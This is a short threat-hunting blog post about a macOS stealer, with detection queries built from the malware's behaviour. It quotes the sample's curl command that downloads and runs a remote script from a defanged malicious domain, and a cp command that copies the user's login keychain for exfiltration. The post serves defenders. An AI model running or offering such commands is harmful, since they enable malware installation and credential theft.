147. Detecting a macOS Stealer

Hello everyone!

We see lots of stealers for Windows. But what about macOS? Recently MalwareHunterTeam shared information on an interesting macOS malware sample.

The sample abuses cURL to download a script from a remote server:

curl -sfo /tmp/up.sh https://www.appleprocesshub[.]com/fSidEOWW.sh && chmod 777 /tmp/up.sh && sh /tmp/up.sh

The adversary uses notable command ine parameters to execute cURL, including -s (silent mode) and -f (fail silently). We can use it to build a hunting query:

event_type: "processcreatemac"

AND

proc_file_name: "curl"

AND

cmdline: "sfo"

The script collects system information as well as sensitive data, including the keychain, for example:

cp /Users/root/Library/Keychains/Login.keychain-db /tmp/20250516021858/VMQFcNm+96F/.keychain-db

This procedure can be also used to build a query:

event_type: "processcreatemac"

AND

proc_file_name: "cp"

AND

cmdline: "keychain"

Collected data is archived and exfiltrated to the same server, that's it.

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge